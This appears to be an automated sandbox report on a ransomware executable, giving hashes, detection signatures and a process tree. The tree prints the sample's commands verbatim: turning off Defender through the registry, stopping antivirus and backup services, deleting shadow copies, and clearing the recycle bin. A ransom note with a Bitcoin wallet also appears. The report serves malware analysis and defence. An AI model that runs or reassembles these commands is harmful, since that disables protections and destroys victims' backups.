Analysis
-
max time kernel
140s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
07-06-2022 18:29
Static task
static1
Behavioral task
behavioral1
Sample
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
Resource
win10v2004-20220414-en
General
-
Target
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
-
Size
87KB
-
MD5
2ef91650e60c37e9f0b35c3d7e172848
-
SHA1
76f18f62b8560e77141e0a1c21b0780187fdfdb9
-
SHA256
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709
-
SHA512
be8f454bedbacdc0ac0a07323f951426b917c087cbf533f80d761e03af18bcfe179c762014878a7f5a22c8925cae1498f1d18c792a943b5bce45c636c81cde3f
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/3760-130-0x0000000000450000-0x000000000046C000-memory.dmp disable_win_def -
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid process 37 3864 mshta.exe 38 3864 mshta.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
agfdupi1.exepid process 664 agfdupi1.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe -
Drops startup file 1 IoCs
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe -
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe -
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 796 sc.exe 2888 sc.exe 1748 sc.exe 5044 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 5224 vssadmin.exe 5340 vssadmin.exe 5332 vssadmin.exe 5324 vssadmin.exe 5308 vssadmin.exe 5284 vssadmin.exe 5276 vssadmin.exe 5300 vssadmin.exe 5268 vssadmin.exe 5260 vssadmin.exe 5316 vssadmin.exe 5292 vssadmin.exe 5252 vssadmin.exe 5244 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1516 taskkill.exe 3808 taskkill.exe 4500 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exepowershell.exepid process 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3000 powershell.exe 3000 powershell.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exepowershell.exetaskkill.exetaskkill.exetaskkill.exevssvc.exeagfdupi1.exedescription pid process Token: SeDebugPrivilege 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 1516 taskkill.exe Token: SeDebugPrivilege 3808 taskkill.exe Token: SeDebugPrivilege 4500 taskkill.exe Token: SeBackupPrivilege 5128 vssvc.exe Token: SeRestorePrivilege 5128 vssvc.exe Token: SeAuditPrivilege 5128 vssvc.exe Token: SeAssignPrimaryTokenPrivilege 664 agfdupi1.exe Token: SeIncreaseQuotaPrivilege 664 agfdupi1.exe Token: SeImpersonatePrivilege 664 agfdupi1.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exepid process 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exepid process 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3760 wrote to memory of 3000 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe powershell.exe PID 3760 wrote to memory of 3000 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe powershell.exe PID 3760 wrote to memory of 4592 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4592 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4140 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4140 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4824 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4824 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 764 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 764 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4584 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4584 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4568 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4568 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4460 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4460 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4416 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4416 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 3848 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 3848 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4960 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4960 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 1232 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 1232 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 4592 wrote to memory of 2944 4592 net.exe net1.exe PID 4592 wrote to memory of 2944 4592 net.exe net1.exe PID 3760 wrote to memory of 1444 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 1444 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 4140 wrote to memory of 2756 4140 net.exe net1.exe PID 4140 wrote to memory of 2756 4140 net.exe net1.exe PID 3760 wrote to memory of 3832 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 3832 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 4584 wrote to memory of 3252 4584 net.exe net1.exe PID 4584 wrote to memory of 3252 4584 net.exe net1.exe PID 764 wrote to memory of 4308 764 net.exe net1.exe PID 764 wrote to memory of 4308 764 net.exe net1.exe PID 4824 wrote to memory of 5000 4824 net.exe net1.exe PID 4824 wrote to memory of 5000 4824 net.exe net1.exe PID 3760 wrote to memory of 220 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 220 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 2324 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 2324 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 3708 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 3708 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 4460 wrote to memory of 3532 4460 net.exe net1.exe PID 4460 wrote to memory of 3532 4460 net.exe net1.exe PID 4416 wrote to memory of 2196 4416 net.exe net1.exe PID 4416 wrote to memory of 2196 4416 net.exe net1.exe PID 4568 wrote to memory of 2292 4568 net.exe net1.exe PID 4568 wrote to memory of 2292 4568 net.exe net1.exe PID 4960 wrote to memory of 3308 4960 net.exe net1.exe PID 4960 wrote to memory of 3308 4960 net.exe net1.exe PID 3760 wrote to memory of 4864 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4864 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3848 wrote to memory of 984 3848 net.exe net1.exe PID 3848 wrote to memory of 984 3848 net.exe net1.exe PID 1232 wrote to memory of 1044 1232 net.exe net1.exe PID 1232 wrote to memory of 1044 1232 net.exe net1.exe PID 3760 wrote to memory of 1400 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 1400 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 1444 wrote to memory of 4056 1444 net.exe net1.exe PID 1444 wrote to memory of 4056 1444 net.exe net1.exe PID 3760 wrote to memory of 4876 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe PID 3760 wrote to memory of 4876 3760 a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe"C:\Users\Admin\AppData\Local\Temp\a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:2944
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:2756
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:5000
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:4308
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:3252
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:2292
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:3532
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:2196
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:984
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:3308
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:4056
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:3832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:3388
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:1044
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:2904
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:3708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:2380
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:4864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:5048
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:1400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:4964
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:2324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:4812
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:4876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:4860
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:3888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:2320
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:3236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:1740
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:1380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:3720
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:4708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:2080
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:4296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:4492
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:4520
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:4316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:3352
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:3856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:1520
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:4348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:4848
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:3544
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:4872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:5204
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:796
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3808
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:5352
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5340
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5332
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5324
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5316
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5308
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5300
-
-
